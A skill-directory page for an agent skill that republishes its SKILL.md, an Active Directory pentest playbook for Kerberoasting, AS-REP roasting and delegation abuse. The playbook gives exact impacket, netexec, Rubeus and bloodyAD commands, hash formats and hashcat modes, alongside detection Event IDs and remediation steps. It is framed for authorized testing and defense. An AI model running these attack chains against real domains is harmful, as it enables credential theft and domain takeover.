Cybersecurity
ohmyjahh/xquads-squads
Squad de 15 agentes de seguranca ofensiva e defensiva (Georgia Weidman, Peter Kim, Jim Manico, Chris Sanders, Omar Santos, Marcus Carey) cobrindo pentest, red team, blue team, AppSec, recon e…
Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).
$ npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install ADScanPro/Claude-AD kerberos-attacks --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/kerberos-attacks .claude/skills/kerberos-attacks && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "kerberos-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/kerberos-attacks into .claude/skills/kerberos-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "kerberos-attacks", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/ADScanPro/Claude-AD/tree/main/skills/kerberos-attacksType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install ADScanPro/Claude-AD kerberos-attacks --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/kerberos-attacks .agents/skills/kerberos-attacks && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "kerberos-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/kerberos-attacks into .agents/skills/kerberos-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "kerberos-attacks", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install ADScanPro/Claude-AD kerberos-attacks --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/kerberos-attacks .cursor/skills/kerberos-attacks && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "kerberos-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/kerberos-attacks into .cursor/skills/kerberos-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "kerberos-attacks", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/ADScanPro/Claude-AD.git --path skills/kerberos-attacks--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install ADScanPro/Claude-AD kerberos-attacks --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/kerberos-attacks .gemini/skills/kerberos-attacks && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "kerberos-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/kerberos-attacks into .gemini/skills/kerberos-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "kerberos-attacks", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install ADScanPro/Claude-AD kerberos-attacksInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/kerberos-attacks .github/skills/kerberos-attacks && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "kerberos-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/kerberos-attacks into .github/skills/kerberos-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "kerberos-attacks", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install ADScanPro/Claude-AD kerberos-attacks --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/kerberos-attacks .opencode/skills/kerberos-attacks && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "kerberos-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/kerberos-attacks into .opencode/skills/kerberos-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "kerberos-attacks", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
kerberos-attacksKerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).
Kerberos Attacks is an agent skill from ADScanPro/Claude-AD. Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD). Use when the target has SPN-bearing service accounts, accounts without pre-authentication, or delegation configured on computer/user objects, and you want the exact impacket/Rubeus/bloodyAD command, the hash format and hashcat mode, the Windows Event IDs that fire, and the remediation to write up.
Its SKILL.md is about 2.9k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Security, covering Red teaming and adversary simulation and Penetration testing. The repository describes itself as: Active Directory pentest methodology for Claude Code: skills, agents and slash commands for internal AD red-team work (Kerberoasting, ADCS ESC1-17, DCSync, ACL abuse, NTLM relay… The licence is MIT.
3 steps, taken from the step headings in SKILL.md.
Read from SKILL.md and the folder at commit 73efec5. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
No scripts in the folder and no shell commands in SKILL.md.
From the folder's file list and the shell code blocks in SKILL.md.
Links to these hosts (documentation or services it may open):
thehacker.recipesFrom URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Kerberos Attacks loads about 2.9k tokens when it runs. Until then it costs about 122 tokens; SKILL.md has 1,156 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check noted patterns worth knowing about, such as sudo or a known installer.
tickets (`KRB_AP_ERR_SKEW`). Sync with `sudo ntpdate <dc-ip>` or `faketime`.Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from ADScanPro/Claude-AD at commit 73efec5, republished under its MIT licence (© ADScanPro). 1,156 words, ~2,865 tokens.
.claude/skills/kerberos-attacks/SKILL.md (or your agent's skills folder).Standard-tooling playbook for the four Kerberos abuse families you meet on almost every internal AD engagement. You drive every tool yourself. This skill tells you what each attack is, the exact command, how the loot looks and how to crack it, what the DC logs, and what the remediation write-up should say.
Requirements before you touch these: valid domain credentials (any user is enough for Kerberoasting and delegation reads; AS-REP roasting needs only a username list), correct DNS pointing at the DC, and clock skew under 5 minutes or Kerberos rejects your tickets (KRB_AP_ERR_SKEW). Sync with sudo ntpdate <dc-ip> or faketime.
MITRE ATT&CK: T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting)
What it is. Any authenticated user can request a service ticket (TGS) for any account that has a Service Principal Name (SPN) set. The TGS is encrypted with the service account's password-derived key. If the DC hands you an RC4 (etype 23) ticket, you crack it offline to recover the account's cleartext password. Service accounts are the target because they often have weak, non-expiring, human-set passwords and elevated rights.
Standard commands.
Request tickets for every kerberoastable account (impacket):
GetUserSPNs.py -request -dc-ip 10.0.0.10 CORP.LOCAL/svc_user:'Password123' -outputfile kerb_hashes.txtEnumerate first without requesting (see who is roastable before making noise):
GetUserSPNs.py -dc-ip 10.0.0.10 CORP.LOCAL/svc_user:'Password123'netexec equivalent (also does it in one line):
nxc ldap 10.0.0.10 -u svc_user -p 'Password123' --kerberoasting kerb_hashes.txtTargeted roast of a single account (quieter, one 4769 instead of dozens):
GetUserSPNs.py -request-user sqlsvc -dc-ip 10.0.0.10 CORP.LOCAL/svc_user:'Password123'Hash format + cracking. The loot is a $krb5tgs$ hash. RC4 tickets are hashcat mode 13100; AES256 tickets (etype 18) are mode 19700 and are far slower.
$krb5tgs$23$*sqlsvc$CORP.LOCAL$MSSQLSvc/db01.corp.local*$a1b2... # RC4, -m 13100
$krb5tgs$18$sqlsvc$CORP.LOCAL$... # AES256, -m 19700hashcat -m 13100 -a 0 kerb_hashes.txt rockyou.txt --forceDetection (blue-team Event IDs).
Ticket Encryption Type 0x17 (RC4) when the domain otherwise uses AES, and a single account requesting many distinct service tickets in a short window. Baseline normal 4769 volume first; it is a high-noise event.Remediation to write up.
msDS-SupportedEncryptionTypes to AES-only on service accounts so RC4 tickets are never issued.MITRE ATT&CK: T1558.004 (Steal or Forge Kerberos Tickets: AS-REP Roasting)
What it is. Accounts with "Do not require Kerberos preauthentication" set (DONT_REQ_PREAUTH in userAccountControl) will return an AS-REP encrypted with the user's password-derived key to anyone who asks, no credentials needed. Crack it offline for the cleartext. Because it needs no valid domain account, it works from a username list alone.
Standard commands.
Roast every preauth-disabled account (needs a valid credential to read the directory for the list):
GetNPUsers.py -dc-ip 10.0.0.10 -request CORP.LOCAL/svc_user:'Password123' -outputfile asrep_hashes.txtUnauthenticated, spraying a username wordlist (no credential at all):
GetNPUsers.py -dc-ip 10.0.0.10 -no-pass -usersfile users.txt CORP.LOCAL/ -format hashcatnetexec equivalent:
nxc ldap 10.0.0.10 -u svc_user -p 'Password123' --asreproast asrep_hashes.txtHash format + cracking. Loot is a $krb5asrep$ hash, hashcat mode 18200 (RC4).
$krb5asrep$23$user@CORP.LOCAL:a1b2c3...hashcat -m 18200 -a 0 asrep_hashes.txt rockyou.txt --forceDetection.
Remediation.
userAccountControl for the DONT_REQ_PREAUTH bit, 0x400000).Kerberos delegation lets a service impersonate a user to a downstream service. Misconfigured, it becomes a privilege-escalation and lateral-movement primitive. Three flavors.
MITRE ATT&CK: T1558 (Steal or Forge Kerberos Tickets) / T1550 (Use Alternate Authentication Material)
What it is. A computer or account with TRUSTED_FOR_DELEGATION in userAccountControl caches the full TGT of any user who authenticates to it. Compromise that host, force a privileged account (or a DC's machine account) to authenticate to it (see the coercion skill), and extract the TGT to impersonate that principal anywhere. A DC's TGT means domain compromise.
Find it (BloodHound CE, or LDAP):
nxc ldap 10.0.0.10 -u svc_user -p 'Password123' --trusted-for-delegationGet-DomainComputer -Unconstrained # PowerView, on a Windows footholdExtract cached TGTs from a host you control (impacket, remotely via secretsdump-style flow, or Rubeus on-host):
Rubeus.exe monitor /interval:5 /nowrap # on the compromised host, watch for inbound TGTs
Rubeus.exe dump /nowrap # dump cached ticketsPair with a coercion (PetitPotam/PrinterBug) to force DC01$ to authenticate to your unconstrained host, then reuse the captured DC TGT.
Detection. 4769/4768 ticket requests tied to the delegation host; anomalous machine-account authentication to a non-DC server (a DC's $ account logging on to a member server is abnormal). Defender for Identity flags unconstrained-delegation exposure.
Remediation. Eliminate unconstrained delegation entirely; migrate to constrained or resource-based. Put sensitive accounts in the Protected Users group and/or mark them "Account is sensitive and cannot be delegated" (NOT_DELEGATED, 0x100000), which prevents their TGT from being cached.
MITRE ATT&CK: T1558.003 area / T1550
What it is. An account configured with msDS-AllowedToDelegateTo (classic constrained delegation) can request a ticket to itself on behalf of any user (S4U2Self) and then forward it to the listed target SPN (S4U2Proxy). If protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION) is set, you can impersonate an arbitrary user, including a Domain Admin, to the target service.
Abuse (impacket getST):
getST.py -spn cifs/fileserver.corp.local -impersonate Administrator \
-dc-ip 10.0.0.10 CORP.LOCAL/svc_web:'Password123'
export KRB5CCNAME=Administrator.ccache
nxc smb fileserver.corp.local --use-kcacheFind accounts with constrained delegation:
nxc ldap 10.0.0.10 -u svc_user -p 'Password123' --find-delegationDetection. 4769 for the target SPN where the requesting service is impersonating a different user; unusual S4U2Proxy activity in the DC logs.
Remediation. Restrict msDS-AllowedToDelegateTo to the minimum SPNs. Disable protocol transition unless required. Protect high-value accounts with Protected Users / NOT_DELEGATED.
MITRE ATT&CK: T1550 / T1098 (Account Manipulation)
What it is. The delegation trust lives on the target object, in msDS-AllowedToActOnBehalfOfOtherIdentity. If you can write that attribute on a computer object (via GenericWrite/GenericAll/WriteDACL over it, see the ACL abuse skill), you point it at a computer account you control, then S4U your way to impersonating any user to that target. The classic chain uses MachineAccountQuota (default 10) to add your own computer account first.
Standard chain.
Add a computer account you control (if MachineAccountQuota > 0):
addcomputer.py -computer-name 'EVIL$' -computer-pass 'EvilPass123' \
-dc-ip 10.0.0.10 CORP.LOCAL/svc_user:'Password123'Write the RBCD attribute on the victim computer (bloodyAD):
bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u svc_user -p 'Password123' \
add rbcd TARGET$ EVIL$impacket alternative for the write:
rbcd.py -delegate-from 'EVIL$' -delegate-to 'TARGET$' -action write \
-dc-ip 10.0.0.10 CORP.LOCAL/svc_user:'Password123'Get the impersonated ticket and use it:
getST.py -spn cifs/target.corp.local -impersonate Administrator \
-dc-ip 10.0.0.10 'CORP.LOCAL/EVIL$:EvilPass123'
export KRB5CCNAME=Administrator.ccache
nxc smb target.corp.local --use-kcacheDetection.
msDS-AllowedToActOnBehalfOfOtherIdentity attribute; the write is the loud, catchable moment.Remediation.
MachineAccountQuota to 0 so unprivileged users cannot add computer accounts.msDS-AllowedToActOnBehalfOfOtherIdentity.NOT_DELEGATED on sensitive accounts blunts the impersonation.Only run these against systems you are explicitly authorized to test. Use lab or generic values in any write-up, never a client's real SPNs, hostnames, or hashes.
© ADScanPro, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in skills/kerberos-attacks of ADScanPro/Claude-AD.
Open the folder on GitHubat commit 73efec5
Kerberos Attacks next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Kerberos Attacks this skillADScanPro/Claude-AD | 209 | — | ~2.9k | Automated safety check: Notes | MIT | |
| Cybersecurityohmyjahh/xquads-squads | 276 | — | ~895 | Automated safety check: Pass | MIT | |
| Detecting T1548 Abuse Elevation Control Mechanismmukul975/Anthropic-Cybersecurity-Skills | 34k | — | ~1.5k | Automated safety check: Notes | Apache-2.0 | |
| Exploiting Vulnerabilities With Metasploit Frameworkmukul975/Anthropic-Cybersecurity-Skills | 34k | — | ~1.9k | Automated safety check: Notes | Apache-2.0 | |
| Detecting Attacks On Historian Serversmukul975/Anthropic-Cybersecurity-Skills | 34k | — | ~3k | Automated safety check: Pass | Apache-2.0 | |
| Performing Web Application Firewall Bypassmukul975/Anthropic-Cybersecurity-Skills | 34k | — | ~2.4k | Automated safety check: Pass | Apache-2.0 |
ohmyjahh/xquads-squads
Squad de 15 agentes de seguranca ofensiva e defensiva (Georgia Weidman, Peter Kim, Jim Manico, Chris Sanders, Omar Santos, Marcus Carey) cobrindo pentest, red team, blue team, AppSec, recon e…
mukul975/Anthropic-Cybersecurity-Skills
Detect abuse of elevation control mechanisms (T1548), including Windows UAC bypass via auto-elevating binaries like fodhelper.exe and Linux sudo/setuid/setgid exploitation, by monitoring registry…
mukul975/Anthropic-Cybersecurity-Skills
Uses the Metasploit Framework (msfconsole and its exploit, auxiliary, and post-exploitation modules) to validate that identified CVEs and vulnerabilities are actually exploitable, gather…
mukul975/Anthropic-Cybersecurity-Skills
Detect cyber attacks on OT historian servers (OSIsoft PI, Ignition, GE Proficy, Wonderware InSQL) using a Python detector that flags unauthorized queries, data manipulation, and lateral-movement…
mukul975/Anthropic-Cybersecurity-Skills
Bypasses Web Application Firewall protections using encoding tricks, HTTP method manipulation, parameter pollution, and payload obfuscation to smuggle SQL injection, XSS, and other exploit payloads…
mukul975/Anthropic-Cybersecurity-Skills
Manually identifies flaws in application business logic - price manipulation, multi-step workflow bypass, and privilege escalation - by intercepting and modifying requests with Burp Suite, going…
ADScanPro/Claude-AD
Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…
ADScanPro/Claude-AD
Real-world Active Directory environment constraints that silently break attacks when ignored: NTLM disabled (Kerberos fallback), AES-only KDCs (RC4 blocked by GPO), LDAP signing and channel binding…
ADScanPro/Claude-AD
The telemetry each Active Directory technique generates and what alerts a defender: Kerberoasting produces Event 4769 with RC4 encryption (0x17) and an MDI alert, DCSync produces Event 4662 with the…
ADScanPro/Claude-AD
Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).
ADScanPro/Claude-AD
Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB.
ADScanPro/Claude-AD
A high-level conceptual mapping from Active Directory attack techniques to the compliance controls they touch.
Categories
Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD). Kerberos Attacks is an agent skill from ADScanPro/Claude-AD. Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).
Kerberos Attacks fits situations like: the target has SPN-bearing service accounts; accounts without pre-authentication; delegation configured on computer/user objects; you want the exact impacket/Rubeus/bloodyAD command.
Run `npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a claude-code`. Or copy the skill folder (skills/kerberos-attacks in ADScanPro/Claude-AD) into .claude/skills/kerberos-attacks in your project. Claude Code loads it when a task matches its description.
Run `npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a codex`. Or copy the skill folder (skills/kerberos-attacks in ADScanPro/Claude-AD) into .agents/skills/kerberos-attacks in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/kerberos-attacks, .gemini/skills/kerberos-attacks, .github/skills/kerberos-attacks and .opencode/skills/kerberos-attacks in your project.
SKILL.md names no scripts, command-line tools or credentials: Kerberos Attacks is instructions for the agent only.
SKILL.md names 1 domain. As links in the text: thehacker.recipes. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found notes only (runs commands with sudo), nothing it rates as a warning. It is not a guarantee. Review the folder before installing.
Kerberos Attacks is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 2.9k tokens (SKILL.md is roughly 11k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Kerberos Attacks: Cybersecurity (ohmyjahh/xquads-squads, 276 stars), Detecting T1548 Abuse Elevation Control Mechanism (mukul975/Anthropic-Cybersecurity-Skills, 34k stars), Exploiting Vulnerabilities With Metasploit Framework (mukul975/Anthropic-Cybersecurity-Skills, 34k stars) and Detecting Attacks On Historian Servers (mukul975/Anthropic-Cybersecurity-Skills, 34k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
ADScanPro (a GitHub user) maintains it in ADScanPro/Claude-AD, which has 209 GitHub stars. The repository holds 7 skills in this directory. The repository was last updated on August 24, 2026.
Source: ADScanPro/Claude-AD on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.